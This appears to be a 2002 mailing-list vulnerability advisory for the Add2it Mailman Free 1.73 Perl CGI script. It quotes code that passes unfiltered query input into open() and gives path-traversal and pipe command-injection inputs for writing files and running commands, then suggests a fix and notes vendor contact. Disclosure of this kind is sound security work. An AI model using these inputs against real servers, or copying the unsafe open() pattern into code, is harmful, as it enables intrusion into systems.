#!/exploit/by/b0iler
#
#Add2it Mailman Free V1.73
#script url: http://www.add2it.com/scripts/mailman-free.shtml

The problem is that the script does not filter input well:

$command = $ENV{'QUERY_STRING'};
($list, $email) = split(/=/,$command);

and then the script makes an open() call based on input from the user:

open(LIST, "${path}data/lists/$list");

There is also open()s with > and >> which use $list
The way to exploit this to write to a file would be:

../../../../file=datato.write

or for command execution:

../../../../bin/command|=blahbleh.com

This exploit is for the free version of Add2it Mailman, but the same
vulnerability is probably valid for the paid for version.

Fix: filter meta characters and .. and use < << > >> with open()

Author was contacted on 1/30/02 and replied that day stating the problem
would be fixed in the next release. Which should be out by the time of this
posting, although I haven't gotten any word about it's release yet.

-http://b0iler.advknowledge.net

_________________________________________________________________
MSN Photos is the easiest way to share and print your photos:
http://photos.msn.com/support/worldwide.aspx

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]